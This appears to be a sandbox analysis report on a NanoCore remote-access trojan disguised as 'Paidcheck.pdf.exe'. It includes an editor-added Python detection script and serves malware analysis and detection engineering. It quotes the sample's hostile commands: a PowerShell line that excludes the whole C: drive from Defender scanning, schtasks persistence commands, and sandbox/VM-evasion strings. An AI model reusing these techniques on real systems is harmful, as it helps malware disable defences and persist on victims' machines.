      Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.486430040.0000000003EBC000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Paidcheck.pdf.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: explorerr.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: 10.2.RegAsm.exe.400000.0.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs, Cryptographic APIs: 'CreateDecryptor'
      Source: 10.2.RegAsm.exe.400000.0.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs, Cryptographic APIs: 'TransformFinalBlock'
      Source: 10.2.RegAsm.exe.400000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs, Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: classification engine, Classification label: mal100.troj.evad.winEXE@20/24@0/1
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe, File created: C:\Program Files (x86)\DHCP Monitor
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn
      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2992:120:WilError_01
      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2292:120:WilError_01
      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01
      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_01
      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:484:120:WilError_01
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\{bcd083ef-bf90-4541-bf76-579f377e7cee}
      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1036:120:WilError_01
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe, File created: C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe, Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs'
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe, File read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe, File read: C:\Users\user\Desktop\Paidcheck.pdf.exe
      Source: unknown, Process created: C:\Users\user\Desktop\Paidcheck.pdf.exe 'C:\Users\user\Desktop\Paidcheck.pdf.exe'
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe, Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs'
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe, Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
      Source: C:\Windows\SysWOW64\wscript.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe, Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'
      Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe, Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp'
      Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown, Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe 0
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown, Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown, Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
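The process tree above is more useful to a detection engineer than any of the hashes: a document-named executable launches a script host from %Temp%, the script host runs PowerShell with Set-MpPreference -ExclusionPath, and a copy of RegAsm.exe in %Temp% registers scheduled tasks from XML files that also live in %Temp%. The following Python is an added example by the editor, not part of the Joe Sandbox report or of the sample: it parses the report's own "Process created" records (copied verbatim as the sample input) and flags the parent/child relationships a rule set would key on. The rule names, the set of script hosts, the double-extension list and the %Temp% path heuristic are the editor's assumptions, not anything the report states.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    parent: str   # image path of the creating process ("unknown" when not observed)
    image: str    # image path of the created process
    cmdline: str  # rest of the logged command line


@dataclass
class Finding:
    rule: str
    image: str
    detail: str


# The first token of a record is the image path. It may contain spaces
# ("C:\Program Files (x86)\..."), so split at the first ".exe" rather than at whitespace.
IMAGE_RE = re.compile(r"^(?P<image>.+?\.exe)(?:\s+(?P<cmdline>.*))?$", re.IGNORECASE)
# Document-like name in front of the real .exe extension (e.g. Paidcheck.pdf.exe).
DOUBLE_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.exe$", re.IGNORECASE)
# schtasks /xml '<path>' as quoted in the report.
XML_ARG_RE = re.compile(r"/xml\s+'([^']+)'", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}  # editor's list
USER_TEMP = "\\appdata\\local\\temp\\"                       # %LOCALAPPDATA%\Temp


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def in_user_temp(text):
    return USER_TEMP in text.lower()


def parse_event(parent, record):
    m = IMAGE_RE.match(record.strip())
    if not m:
        raise ValueError("unparseable process record: %r" % record)
    return Event(parent=parent, image=m.group("image"), cmdline=m.group("cmdline") or "")


def evaluate(event):
    """Apply each heuristic to one event and return the findings it raises."""
    findings = []
    name = basename(event.image)
    parent_name = basename(event.parent)
    low = event.cmdline.lower()
    if DOUBLE_EXT_RE.search(event.image):
        findings.append(Finding("double_extension", event.image,
                                "document-looking filename that is really an executable"))
    if in_user_temp(event.image):
        findings.append(Finding("exec_from_user_temp", event.image,
                                "executable launched from %LOCALAPPDATA%\\Temp"))
    if name in SCRIPT_HOSTS and in_user_temp(event.cmdline):
        findings.append(Finding("script_from_user_temp", event.image,
                                "script host running a file from %LOCALAPPDATA%\\Temp"))
    # Set-MpPreference -ExclusionPath carves paths out of Defender's scanning.
    if name == "powershell.exe" and "set-mppreference" in low and "-exclusionpath" in low:
        detail = "Defender exclusion added: " + event.cmdline
        if parent_name in SCRIPT_HOSTS:
            detail = "spawned by script host %s; %s" % (parent_name, detail)
        findings.append(Finding("defender_exclusion_tamper", event.image, detail))
    if name == "schtasks.exe" and "/create" in low:
        reasons = []
        xml = XML_ARG_RE.search(event.cmdline)
        if xml and in_user_temp(xml.group(1)):
            reasons.append("task XML read from " + xml.group(1))
        if in_user_temp(event.parent):
            reasons.append("parent runs from %LOCALAPPDATA%\\Temp: " + event.parent)
        if reasons:
            findings.append(Finding("scheduled_task_from_temp", event.image, "; ".join(reasons)))
    return findings


def scan(records):
    """records: iterable of (parent_image, record_text) pairs -> list of Finding."""
    return [f for parent, rec in records for f in evaluate(parse_event(parent, rec))]


# Copied from the report's "Process created" lines: (parent image, record text).
SAMPLE_RECORDS = [
    ("unknown",
     r"C:\Users\user\Desktop\Paidcheck.pdf.exe 'C:\Users\user\Desktop\Paidcheck.pdf.exe'"),
    (r"C:\Users\user\Desktop\Paidcheck.pdf.exe",
     r"C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' "
     r"'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs'"),
    (r"C:\Users\user\Desktop\Paidcheck.pdf.exe",
     r"C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe"),
    (r"C:\Windows\SysWOW64\wscript.exe",
     r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "
     r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath "
     r"C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'"),
    (r"C:\Users\user\AppData\Local\Temp\RegAsm.exe",
     r"C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' "
     r"/xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'"),
    ("unknown",
     r"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print("%-26s %s  (%s)" % (f.rule, f.image, f.detail))
```

Run against the six records, the example raises one finding each for the double extension, the VBS run from %Temp%, RegAsm.exe executing from %Temp%, the Defender exclusion spawned by wscript.exe, and the task creation from a %Temp% XML by a %Temp% parent; the dhcpmon.exe launch from Program Files raises nothing on its own. Note that `Set-MpPreference -ExclusionPath C:\` excludes the whole system drive from Defender scanning, not only the dropped explorerr.exe; on a live host `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` shows whether such an exclusion is present.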
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
      Source: Window Recorder, Window detected: More than 3 window changes detected
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: Paidcheck.pdf.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: Paidcheck.pdf.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Paidcheck.pdf.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: RegAsm.pdb source: dhcpmon.exe, RegAsm.exe.0.dr
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmp, RegAsm.exe, 00000011.00000002.325398042.0000000000CA2000.00000002.00020000.sdmp, dhcpmon.exe, 00000013.00000000.322931989.00000000002A2000.00000002.00020000.sdmp, dhcpmon.exe, 00000015.00000000.334603613.00000000008A2000.00000002.00020000.sdmp, RegAsm.exe.0.dr
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegAsm.exe, 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp

      Data Obfuscation:

      .NET source code contains potential unpacker
      Source: Paidcheck.pdf.exe, AddressBook.cs | .Net Code: .ctor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: explorerr.exe.0.dr, AddressBook.cs | .Net Code: .ctor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: 0.0.Paidcheck.pdf.exe.6a0000.0.unpack, AddressBook.cs | .Net Code: .ctor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: 0.2.Paidcheck.pdf.exe.6a0000.0.unpack, AddressBook.cs | .Net Code: .ctor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: Paidcheck.pdf.exe | Static PE information: 0xC8D6E03A [Sat Oct 10 03:15:06 2076 UTC]
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF3795 push es; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF3791 push es; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF3785 push es; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF3775 push es; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF3771 push es; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF375D push es; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF3735 push es; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF3731 push es; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF372D push es; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF6594 push E9072621h; retf
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF2A70 push es; iretd
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF2A35 push es; iretd
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF1A22 push ss; iretd
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF1A10 push ss; iretd
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF29CE push es; iretd
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_07B2313F push cs; iretd
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_07B23D3C push ds; ret
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_07B23D05 push eax; ret
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_007644A3 push es; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_00764469 push cs; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_00764289 push es; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_0509ACFA push E801005Eh; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_0509B114 push 8BC04589h; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_0509B161 push 8BBC4589h; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_0509B1A8 push 8BB84589h; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_0509B1F1 push 8BB44589h; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_0509B235 push 8BB04589h; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 17_2_00CA4289 push es; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 17_2_00CA4469 push cs; retf
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 17_2_00CA44A3 push es; retf
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs | High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs | High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | File created: C:\Users\user\AppData\Local\Temp\RegAsm.exe
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

      Boot Survival:

      Creates an undocumented autostart registry key
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe\:Zone.Identifier:$DATA

      Hooking and other Techniques for Hiding and Protection:

      Uses an obfuscated file name to hide its real file extension (double extension)
      Source: Possible double extension: pdf.exe | Static PE information: Paidcheck.pdf.exe
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: Paidcheck.pdf.exe, 00000000.00000002.306008181.0000000002CD5000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeWindow / User API: threadDelayed 2166
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: threadDelayed 1995
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: threadDelayed 7581
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: foregroundWindowGot 420
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: foregroundWindowGot 504
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3562
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3681
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe TID: 2412Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 3360Thread sleep time: -21213755684765971s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3820Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 5380Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 1260Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5900Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: powershell.exe, 0000000B.00000003.399307837.000000000563E000.00000004.00000001.sdmpBinary or memory string: Hyper-V
      Source: Paidcheck.pdf.exe, 00000000.00000002.306008181.0000000002CD5000.00000004.00000001.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
